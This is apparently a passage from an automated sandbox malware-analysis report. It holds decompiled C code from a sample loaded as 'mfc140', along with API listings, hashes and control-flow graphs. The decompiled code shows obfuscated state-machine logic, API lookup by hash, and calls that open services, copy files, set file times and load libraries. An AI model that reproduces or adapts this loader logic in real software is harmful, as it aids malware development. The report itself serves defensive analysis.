                                                        						 *_t11(_t25);
                                                        						_t42 =  !=  ? 1 : _t42;
                                                        						_t4 = 0xd10de09;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t4 == 0xbf6010) {
                                                        							_t15 =  *0x3ee18c;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        								 *0x3ee18c = _t15;
                                                        							}
                                                        							 *_t15(_t46);
                                                        							goto L31;
                                                        						} else {
                                                        							if(_t4 == 0x10ada17) {
                                                        								_t19 =  *0x3ee310;
                                                        								if(_t19 == 0) {
                                                        									_t19 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x9ba7cd1, _t46);
                                                        									 *0x3ee310 = _t19;
                                                        								}
                                                        								_t46 =  *_t19(0, 0, 0xf003f);
                                                        								if(_t46 == 0) {
                                                        									L31:
                                                        									return _t42;
                                                        								} else {
                                                        									_t4 = 0x1e3d7119;
                                                        									goto L1;
                                                        								}
                                                        							} else {
                                                        								if(_t4 != 0xd10de09) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t22 =  *0x3ee18c;
                                                        									if(_t22 == 0) {
                                                        										_t22 = E003E3E60(_t25, E003E3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        										 *0x3ee18c = _t22;
                                                        									}
                                                        									 *_t22(_t25);
                                                        									_t4 = 0xbf6010;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L32;
                                                        					L22:
                                                        				} while (_t4 != 0x2dd4caa9);
                                                        				return _t42;
                                                        				goto L32;
                                                        			}




















                                                        0x003e8e82
                                                        0x003e8e86
                                                        0x003e8e8c
                                                        0x003e8e91
                                                        0x003e8e96
                                                        0x003e8e98
                                                        0x003e8ea0
                                                        0x003e8ea0
                                                        0x003e8ea0
                                                        0x003e8ea0
                                                        0x003e8ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x003e8f7f
                                                        0x003e9011
                                                        0x00000000
                                                        0x003e8f85
                                                        0x003e8f8a
                                                        0x003e8fd5
                                                        0x003e8fed
                                                        0x003e8fed
                                                        0x003e8ff9
                                                        0x003e8ffb
                                                        0x003e9009
                                                        0x00000000
                                                        0x003e8f8c
                                                        0x003e8f91
                                                        0x00000000
                                                        0x003e8f93
                                                        0x003e8f93
                                                        0x003e8f99
                                                        0x003e8fa3
                                                        0x003e8fa5
                                                        0x003e8fa8
                                                        0x003e8fae
                                                        0x003e8fb1
                                                        0x00000000
                                                        0x003e8fb1
                                                        0x003e8f91
                                                        0x003e8f8a
                                                        0x00000000
                                                        0x003e8f7f
                                                        0x003e8eab
                                                        0x003e8f3f
                                                        0x003e8f46
                                                        0x003e8f59
                                                        0x003e8f5e
                                                        0x003e8f5e
                                                        0x003e8f64
                                                        0x003e8f6d
                                                        0x003e8f70
                                                        0x00000000
                                                        0x003e8eb1
                                                        0x003e8eb6
                                                        0x003e901b
                                                        0x003e9022
                                                        0x003e9035
                                                        0x003e903a
                                                        0x003e903a
                                                        0x003e9040
                                                        0x00000000
                                                        0x003e8ebc
                                                        0x003e8ec1
                                                        0x003e8efc
                                                        0x003e8f03
                                                        0x003e8f16
                                                        0x003e8f1b
                                                        0x003e8f1b
                                                        0x003e8f2b
                                                        0x003e8f2f
                                                        0x003e9042
                                                        0x003e9049
                                                        0x003e8f35
                                                        0x003e8f35
                                                        0x00000000
                                                        0x003e8f35
                                                        0x003e8ec3
                                                        0x003e8ec8
                                                        0x00000000
                                                        0x003e8ece
                                                        0x003e8ece
                                                        0x003e8ed5
                                                        0x003e8ee8
                                                        0x003e8eed
                                                        0x003e8eed
                                                        0x003e8ef3
                                                        0x003e8ef5
                                                        0x00000000
                                                        0x003e8ef5
                                                        0x003e8ec8
                                                        0x003e8ec1
                                                        0x003e8eb6
                                                        0x00000000
                                                        0x003e8fbb
                                                        0x003e8fbb
                                                        0x003e8fcd
                                                        0x00000000

                                                        APIs
                                                        • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,005CE728,003E8782,?,3251FEFE,?), ref: 003E8FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenService
                                                        • String ID: (\$uw(#$uw(#
                                                        • API String ID: 3098006287-813361818
                                                        • Opcode ID: 19a09ee68957cdf23ab751ccb57212b7e6e3df349a4df5f5313a38f48bbf4f8a
                                                        • Instruction ID: 78b6bbc2b881b371af2f345c21dc38916d6cb9b250a0b5c7445f9b289625706d
                                                        • Opcode Fuzzy Hash: 19a09ee68957cdf23ab751ccb57212b7e6e3df349a4df5f5313a38f48bbf4f8a
                                                        • Instruction Fuzzy Hash: 7141B321F042E49BDB226BBFACC477A229AA7C4750F510B69F949CF7C1EE60CC415B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 3e3780-3e3793 242 3e3795-3e37ab call 3e3f00 call 3e3e60 241->242 243 3e37b0-3e37c5 241->243 242->243 247 3e37c7-3e37dd call 3e3f00 call 3e3e60 243->247 248 3e37e2-3e37fa 243->248 247->248 255 3e37fc-3e3812 call 3e3f00 call 3e3e60 248->255 256 3e3817-3e3832 248->256 255->256 261 3e384f-3e385e 256->261 262 3e3834-3e384a call 3e3f00 call 3e3e60 256->262 269 3e387b-3e38b4 261->269 270 3e3860-3e3876 call 3e3f00 call 3e3e60 261->270 262->261 275 3e38b6-3e38cc call 3e3f00 call 3e3e60 269->275 276 3e38d1-3e38e2 SHFileOperationW 269->276 270->269 275->276
                                                        C-Code - Quality: 62%
                                                        			E003E3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x3eddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3eddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x3eddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3eddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x3eddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E003E3E60(_t36, E003E3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x3eddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x3ee298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E003E3E60(_t36, E003E3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x3ee298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x3ee298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E003E3E60(_t36, E003E3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x3ee298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x3ee30c == 0) {
                                                        					 *0x3ee30c = E003E3E60(_t36, E003E3F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x003e3785
                                                        0x003e3780
                                                        0x003e378c
                                                        0x003e378f
                                                        0x003e3793
                                                        0x003e37a6
                                                        0x003e37ab
                                                        0x003e37ab
                                                        0x003e37b9
                                                        0x003e37bb
                                                        0x003e37c0
                                                        0x003e37c5
                                                        0x003e37d8
                                                        0x003e37dd
                                                        0x003e37dd
                                                        0x003e37ee
                                                        0x003e37f0
                                                        0x003e37f5
                                                        0x003e37fa
                                                        0x003e380d
                                                        0x003e3812
                                                        0x003e3812
                                                        0x003e3826
                                                        0x003e3828
                                                        0x003e382d
                                                        0x003e3832
                                                        0x003e3845
                                                        0x003e384a
                                                        0x003e384a
                                                        0x003e3855
                                                        0x003e3857
                                                        0x003e385e
                                                        0x003e3871
                                                        0x003e3876
                                                        0x003e3876
                                                        0x003e3884
                                                        0x003e388a
                                                        0x003e3892
                                                        0x003e389d
                                                        0x003e38a6
                                                        0x003e38b4
                                                        0x003e38cc
                                                        0x003e38cc
                                                        0x003e38d5
                                                        0x003e38d9
                                                        0x003e38e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: 5c0d4332eba426a45873ba29692ea69c48a9a45b30bd37d7c3f2c4c624f98f58
                                                        • Instruction ID: e2571259b13c115823b046172ad6e5d5bd7baf0cc5d258226f0d2eed19634773
                                                        • Opcode Fuzzy Hash: 5c0d4332eba426a45873ba29692ea69c48a9a45b30bd37d7c3f2c4c624f98f58
                                                        • Instruction Fuzzy Hash: 6A31B0716002E58BD726AB7ADC4976B37EAABC4704F000B2CB515CF2C1EA34DA058B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 283 3e80a0-3e815b 284 3e8163-3e8168 283->284 285 3e8170-3e8175 284->285 286 3e817b 285->286 287 3e8338-3e833d 285->287 288 3e8287-3e829b call 3e34c0 286->288 289 3e8181-3e8186 286->289 290 3e836f-3e8377 287->290 291 3e833f-3e8344 287->291 316 3e829d-3e82b5 call 3e3f00 call 3e3e60 288->316 317 3e82bb-3e82e3 288->317 292 3e818c-3e8191 289->292 293 3e8252-3e8259 289->293 297 3e8379-3e8391 call 3e3f00 call 3e3e60 290->297 298 3e8397-3e83bb CreateFileW 290->298 294 3e8346-3e834b 291->294 295 3e8365-3e836a 291->295 303 3e81e3-3e821a 292->303 304 3e8193-3e8198 292->304 299 3e825b-3e8271 call 3e3f00 call 3e3e60 293->299 300 3e8276-3e8282 293->300 305 3e834d-3e8352 294->305 306 3e83c7-3e83ce 294->306 295->285 297->298 301 3e83ee-3e83fa 298->301 302 3e83bd-3e83c2 298->302 299->300 300->285 302->285 313 3e821c-3e8232 call 3e3f00 call 3e3e60 303->313 314 3e8237-3e824d 303->314 304->305 312 3e819e-3e81e1 call 3eb6e0 304->312 305->285 315 3e8358-3e8364 305->315 310 3e83eb-3e83ec CloseHandle 306->310 311 3e83d0-3e83e6 call 3e3f00 call 3e3e60 306->311 310->301 311->310 312->285 313->314 314->285 316->317 334 3e82e5-3e82fb call 3e3f00 call 3e3e60 317->334 335 3e8300-3e830b 317->335 334->335 347 3e830d-3e8323 call 3e3f00 call 3e3e60 335->347 348 3e8328-3e8333 335->348 347->348 348->284
                                                        C-Code - Quality: 71%
                                                        			E003E80A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				void* _t73;
                                                        				intOrPtr* _t78;
                                                        				intOrPtr* _t80;
                                                        				void* _t82;
                                                        				void* _t83;
                                                        				intOrPtr* _t86;
                                                        				void* _t88;
                                                        				intOrPtr _t89;
                                                        				intOrPtr* _t90;
                                                        				void* _t92;
                                                        				void* _t96;
                                                        				intOrPtr _t101;
                                                        				char _t105;
                                                        				signed int _t122;
                                                        				void* _t125;
                                                        				void* _t127;
                                                        				void* _t128;
                                                        				signed int* _t129;
                                                        				void* _t131;
                                                        
                                                        				_t122 = __edx;
                                                        				_t129 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t128 = _v584;
                                                        				_t96 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t131 = _t58 - 0xea5411f;
                                                        							if(_t131 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t131 == 0) {
                                                        								_t73 = E003E34C0(0x3ed970);
                                                        								_t122 =  *0x3ee158;
                                                        								_t127 = _t73;
                                                        								if(_t122 == 0) {
                                                        									_t122 = E003E3E60(_t96, E003E3F00(0xc6fbcd74), 0xba71dd03, _t128);
                                                        									 *0x3ee158 = _t122;
                                                        								}
                                                        								_t101 =  *0x3ee54c; // 0x5ce728
                                                        								_t50 = _t101 + 0x260; // 0x5ce988
                                                        								_t51 = _t101 + 0x18; // 0x5ce740
                                                        								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
                                                        								_t78 =  *0x3ee494;
                                                        								_t129 =  &(_t129[5]);
                                                        								if(_t78 == 0) {
                                                        									_t83 = E003E3F00(0x9bab0b12);
                                                        									_t122 = 0x7facde30;
                                                        									_t78 = E003E3E60(_t96, _t83, 0x7facde30, _t128);
                                                        									 *0x3ee494 = _t78;
                                                        								}
                                                        								_t125 =  *_t78();
                                                        								_t80 =  *0x3edf30;
                                                        								if(_t80 == 0) {
                                                        									_t82 = E003E3F00(0x9bab0b12);
                                                        									_t122 = 0x5010a54d;
                                                        									_t80 = E003E3E60(_t96, _t82, 0x5010a54d, _t128);
                                                        									 *0x3edf30 = _t80;
                                                        								}
                                                        								 *_t80(_t125, 0, _t127);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t86 =  *0x3ee1d4;
                                                        									if(_t86 == 0) {
                                                        										_t88 = E003E3F00(0x9bab0b12);
                                                        										_t122 = 0xa229df38;
                                                        										_t86 = E003E3E60(_t96, _t88, 0xa229df38, _t128);
                                                        										 *0x3ee1d4 = _t86;
                                                        									}
                                                        									 *_t86( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t89 = _v568;
                                                        										_t105 = _v572;
                                                        										_v560 = _t89;
                                                        										_v552 = _t89;
                                                        										_v544 = _t89;
                                                        										_v536 = _t89;
                                                        										_t90 =  *0x3edee4;
                                                        										_v564 = _t105;
                                                        										_v556 = _t105;
                                                        										_v548 = _t105;
                                                        										_v540 = _t105;
                                                        										_v532 = 0;
                                                        										if(_t90 == 0) {
                                                        											_t92 = E003E3F00(0x9bab0b12);
                                                        											_t122 = 0x4bf45878;
                                                        											_t90 = E003E3E60(_t96, _t92, 0x4bf45878, _t128);
                                                        											 *0x3edee4 = _t90;
                                                        										}
                                                        										 *_t90(_t128, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t96 =  !=  ? 1 : _t96;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E003EB6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t122;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x3ede04 == 0) {
                                                        								_t66 = E003E3F00(0x9bab0b12);
                                                        								_t122 = 0xb66d748a;
                                                        								 *0x3ede04 = E003E3E60(_t96, _t66, 0xb66d748a, _t128);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t128 = _t64;
                                                        							if(_t128 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									if( *0x3ede3c == 0) {
                                                        										 *0x3ede3c = E003E3E60(_t96, E003E3F00(0x9bab0b12), 0x20de7595, _t128);
                                                        									}
                                                        									CloseHandle(_t128); // executed
                                                        									L34:
                                                        									return _t96;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t96;
                                                        					goto L35;
                                                        				}
                                                        			}













































                                                        0x003e80a0
                                                        0x003e80a0
                                                        0x003e80a6
                                                        0x003e80ae
                                                        0x003e80b3
                                                        0x003e80bb
                                                        0x003e80c3
                                                        0x003e80ca
                                                        0x003e80ce
                                                        0x003e80d2
                                                        0x003e80d9
                                                        0x003e80e0
                                                        0x003e80e7
                                                        0x003e80ee
                                                        0x003e80f5
                                                        0x003e80fc
                                                        0x003e8103
                                                        0x003e8112
                                                        0x003e8116
                                                        0x003e8119
                                                        0x003e811d
                                                        0x003e8125
                                                        0x003e8133
                                                        0x003e8137
                                                        0x003e813f
                                                        0x003e8147
                                                        0x003e814f
                                                        0x003e8153
                                                        0x003e815b
                                                        0x003e8163
                                                        0x003e8163
                                                        0x003e8168
                                                        0x003e8170
                                                        0x003e8170
                                                        0x003e8170
                                                        0x003e8170
                                                        0x003e8175
                                                        0x00000000
                                                        0x00000000
                                                        0x003e817b
                                                        0x003e828c
                                                        0x003e8291
                                                        0x003e8297
                                                        0x003e829b
                                                        0x003e82b3
                                                        0x003e82b5
                                                        0x003e82b5
                                                        0x003e82bb
                                                        0x003e82c1
                                                        0x003e82c8
                                                        0x003e82d7
                                                        0x003e82d9
                                                        0x003e82de
                                                        0x003e82e3
                                                        0x003e82ea
                                                        0x003e82ef
                                                        0x003e82f6
                                                        0x003e82fb
                                                        0x003e82fb
                                                        0x003e8302
                                                        0x003e8304
                                                        0x003e830b
                                                        0x003e8312
                                                        0x003e8317
                                                        0x003e831e
                                                        0x003e8323
                                                        0x003e8323
                                                        0x003e832c
                                                        0x003e832e
                                                        0x00000000
                                                        0x003e8181
                                                        0x003e8186
                                                        0x003e8252
                                                        0x003e8259
                                                        0x003e8260
                                                        0x003e8265
                                                        0x003e826c
                                                        0x003e8271
                                                        0x003e8271
                                                        0x003e827b
                                                        0x003e827d
                                                        0x00000000
                                                        0x003e818c
                                                        0x003e8191
                                                        0x003e81e3
                                                        0x003e81e7
                                                        0x003e81eb
                                                        0x003e81ef
                                                        0x003e81f3
                                                        0x003e81f7
                                                        0x003e81fb
                                                        0x003e8200
                                                        0x003e8204
                                                        0x003e8208
                                                        0x003e820c
                                                        0x003e8210
                                                        0x003e821a
                                                        0x003e8221
                                                        0x003e8226
                                                        0x003e822d
                                                        0x003e8232
                                                        0x003e8232
                                                        0x003e8241
                                                        0x003e8245
                                                        0x003e824a
                                                        0x00000000
                                                        0x003e8193
                                                        0x003e8198
                                                        0x00000000
                                                        0x003e819e
                                                        0x003e81a0
                                                        0x003e81a8
                                                        0x003e81c4
                                                        0x003e81c8
                                                        0x003e81d4
                                                        0x003e81d8
                                                        0x003e81dd
                                                        0x00000000
                                                        0x003e81dd
                                                        0x003e8198
                                                        0x003e8191
                                                        0x003e8186
                                                        0x00000000
                                                        0x003e817b
                                                        0x003e833d
                                                        0x003e8377
                                                        0x003e837e
                                                        0x003e8383
                                                        0x003e8391
                                                        0x003e8391
                                                        0x003e83b4
                                                        0x003e83b6
                                                        0x003e83bb
                                                        0x00000000
                                                        0x003e83bd
                                                        0x003e83bd
                                                        0x00000000
                                                        0x003e83bd
                                                        0x003e833f
                                                        0x003e8344
                                                        0x003e8365
                                                        0x00000000
                                                        0x003e8346
                                                        0x003e834b
                                                        0x003e83ce
                                                        0x003e83e6
                                                        0x003e83e6
                                                        0x003e83ec
                                                        0x003e83f1
                                                        0x003e83fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003e834b
                                                        0x003e8344
                                                        0x00000000
                                                        0x003e834d
                                                        0x003e834d
                                                        0x003e8364
                                                        0x00000000
                                                        0x003e8364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003E83B4
                                                        • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 003E83EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2279698396.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2279686443.00000000003E0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279709901.00000000003ED000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.2279716653.00000000003EF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_3e0000_mfc140.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle
                                                        • String ID: (\
                                                        • API String ID: 3498533004-1144764081
                                                        • Opcode ID: f5b9706bea5c369cdbea5793f4fac8c6caaca2901d062248e970327f764eb35c
                                                        • Instruction ID: 9e072d228de8814512ae206b39ee61960d0d811ecf347f0b3db9b858980e14a7
                                                        • Opcode Fuzzy Hash: f5b9706bea5c369cdbea5793f4fac8c6caaca2901d062248e970327f764eb35c
                                                        • Instruction Fuzzy Hash: 1881C070A083958FD71ADF6AC88462BB7E9ABD4744F000A2DF589CB3D0EB74DD018B52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 355 3e7120 356 3e7125-3e712a 355->356 357 3e71b4-3e71b9 356->357 358 3e7130 356->358 359 3e71bb 357->359 360 3e7207-3e720c 357->360 361 3e7136-3e713b 358->361 362 3e7233-3e7248 call 3e34c0 358->362 365 3e71ee-3e7202 call 3e7080 359->365 366 3e71bd-3e71c2 359->366 368 3e720e-3e7222 call 3e7080 360->368 369 3e7227-3e722c 360->369 363 3e713d 361->363 364 3e7190-3e7195 361->364 382 3e724a-3e7260 call 3e3f00 call 3e3e60 362->382 383 3e7265-3e7278 LoadLibraryW 362->383 371 3e713f-3e7144 363->371 372 3e717a-3e718e call 3e7080 363->372 364->369 377 3e719b-3e71af call 3e7080 364->377 365->356 373 3e71c4-3e71c9 366->373 374 3e71d5-3e71e9 call 3e7080 366->374 368->356 369->356 370 3e7232 369->370 379 3e7146-3e714b 371->379 380 3e7164-3e7178 call 3e7080 371->380 372->356 373->369 381 3e71cb-3e71d0 373->381 374->356 377->356 379->369 389 3e7151-3e7162 call 3e7080 379->389 380->356 381->356 382->383 393 3e727a-3e7290 call 3e3f00 call 3e3e60 383->393 394 3e7295-3e72a0 383->394 389->356 393->394 405 3e72bd-3e72c5 394->405 406 3e72a2-3e72b8 call 3e3f00 call 3e3e60 394->406 406->405
                                                        C-Code - Quality: 85%
                                                        			E003E7120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E003E34C0(0x3ed830);
                                                        							__eflags =  *0x3edd1c;
                                                        							if( *0x3edd1c == 0) {
                                                        								 *0x3edd1c = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x3ee548; // 0x607dd8
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x3ee494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x3ee494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x3edf30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E003E3E60(_t21, E003E3F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x3edf30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E003E7080(_t21, 0x3ed7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E003E7080(_t21, 0x3ed8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E003E7080(_t21, 0x3ed800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E003E7080(_t21, 0x3ed860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E003E7080(_t21, 0x3ed890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E003E7080(_t21, 0x3ed7e0, 5, __eflags);
